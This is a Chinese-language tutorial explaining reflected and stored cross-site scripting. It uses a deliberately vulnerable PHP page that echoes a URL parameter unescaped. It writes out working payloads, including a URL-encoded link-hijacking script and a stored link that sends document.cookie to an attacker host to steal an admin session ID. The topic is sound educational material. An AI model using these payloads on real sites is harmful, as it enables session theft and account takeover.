xss攻擊

xss表示Cross Site Scripting(跨站腳本攻擊)，它與SQL注入攻擊相似，SQL注入攻擊中以SQL語句做爲用戶輸入，從而達到查詢/修改/刪除數據的目的，而在xss攻擊中，經過插入惡意腳本，實現對用戶遊覽器的控制。

xss攻擊能夠分紅兩種類型：

1. 非持久型攻擊
2. 持久型攻擊

下面咱們經過具體例子，瞭解兩種類型xss攻擊。

 

1.非持久型xss攻擊

顧名思義，非持久型xss攻擊是一次性的，僅對當次的頁面訪問產生影響。非持久型xss攻擊要求用戶訪問一個被攻擊者篡改後的連接，用戶訪問該連接時，被植入的攻擊腳本被用戶遊覽器執行，從而達到攻擊目的。

假設有如下index.php頁面：

<?php
$name = $_GET['name'];
echo "Welcome $name<br>";
echo "<a href="http://www.cnblogs.com/bangerlee/">Click to Download</a>";
?>

該頁面顯示兩行信息：

• 從URI獲取 'name' 參數，並在頁面顯示
• 顯示跳轉到一條URL的連接

這時，當攻擊者給出如下URL連接：

index.php?name=guest<script>alert('attacked')</script>

當用戶點擊該連接時，將產生如下html代碼，帶'attacked'的告警提示框彈出：

Welcome guest
<script>alert('attacked')</script>
<br>
<a href='http://www.cnblogs.com/bangerlee/'>Click to Download</a>

 

除了插入alert代碼，攻擊者還能夠經過如下URL實現修改連接的目的：

index.php?name=
<script>
window.onload = function() {
var link=document.getElementsByTagName("a");link[0].href="http://attacker-site.com/";}
</script>

當用戶點擊以上攻擊者提供的URL時，index.php頁面被植入腳本，頁面源碼以下：

Welcome 
<script>
window.onload = function() {
var link=document.getElementsByTagName("a");link[0].href="http://attacker-site.com/";}
</script>
<br>
<a href='http://www.cnblogs.com/bangerlee/'>Click to Download</a>

用戶再點擊 "Click to Download" 時，將跳轉至攻擊者提供的連接。

 

對於用於攻擊的URL，攻擊者通常不會直接使用以上可讀形式，而是將其轉換成ASCII碼，如下URL一樣用於實現連接地址變動：

index.php?name=%3c%73%63%72%69%70%74%3e%77%69%6e%64%6f%77%2e%6f%6e%6c%6f%61%64%20%3d%20%66%75%6e%63%74%69%6f%6e%28%29%20%7b%76%61%72%20%6c%69%6e%6b%3d%64%6f%63%75%6d%65%6e%74%2e%67%65%74%45%6c%65%6d%65%6e%74%73%42%79%54%61%67%4e%61%6d%65%28%22%61%22%29%3b%6c%69%6e%6b%5b%30%5d%2e%68%72%65%66%3d%22%68%74%74%70%3a%2f%2f%61%74%74%61%63%6b%65%72%2d%73%69%74%65%2e%63%6f%6d%2f%22%3b%7d%3c%2f%73%63%72%69%70%74%3e

 

2.持久型xss攻擊

持久型xss攻擊會把攻擊者的數據存儲在服務器端，攻擊行爲將伴隨着攻擊數據一直存在。下面來看一個利用持久型xss攻擊獲取session id的實例。

 

session背景知識

咱們知道HTTP是一個無狀態維持的協議，全部請求/應答都是獨立的，其間不保存狀態信息。但有些場景下咱們須要維護狀態信息，例如用戶登陸完web應用後，再必定時間內，用戶再進行登陸，應不須要再輸入用戶名/密碼進行鑑權。

這時咱們用cookie和session解決狀態維護問題，當用戶首次登入時，服務器爲該用戶建立一個 session ID，同時向遊覽器傳送一個 cookie，cookie保存會話鏈接中用到的數據，session ID做爲會話標識，遊覽器後續的請求均基於該session ID。

 

攻擊者能夠提供一個攻擊連接，當用戶點擊該連接時，向攻擊者本身的服務器發送一條保存有用戶session ID的信息，這樣就能夠竊取到用戶的session ID，獲得用戶的執行權限。

 

現有如下login.php，其根據 user_name 在數據中查找相應的 pass_word，而後將用戶提供的 password 與查數據庫所得的 pass_word 進行比較，若是驗證成功則建立對應於 user_name 的 session。

View Code

 

另有如下home.php，其根據登入的用戶是 admin 仍是其餘用戶，顯示不一樣內容，對於admin，其列出全部用戶，對於其餘用戶，提供包含輸入框的form，可在數據庫中插入新的用戶名信息。

View Code

 

注意以上場景中，對 admin 和其餘用戶進行了不一樣的權限設置，admin能夠看到全部用戶列表，下面咱們來看如何獲取 admin 的session ID，從而使得其餘用戶也能得到 admin 的權限。

 

首先，攻擊者以一個普通用戶登陸進來，而後在輸入框中提交如下數據：

<a href=# onclick=\"document.location=\'http://attacker-site.com/xss.php?c=\'+escape\(document.cookie\)\;\">bangerlee</a>

 

攻擊者提交了條帶<a>標籤的數據，該條數據將保存在數據庫中，而當 admin 用戶登入時，包含 "bangerlee" 的用戶列表將顯示，若是 admin 用戶點擊 "bangerlee" 時，在 "attacker-site.com" 所在的服務器上，攻擊者就能夠竊取到 admin 的session-id：

xss.php?c=PHPSESSID%3Dvmcsjsgear6gsogpu7o2imr9f3

有了該session-id，攻擊者在會話有效期內便可得到 admin 用戶的權限，而且因爲攻擊數據已添加入數據庫，只要攻擊數據未被刪除，那麼攻擊還有可能生效，是持久性的。

 

固然，不是隻有持久型xss攻擊才能竊取session ID、用戶的cookie信息，用非持久型xss也能夠，只要引導用戶點擊某連接，將 document.cookie 信息傳到指定服務器便可，以上僅做爲說明持久型xss攻擊的舉例。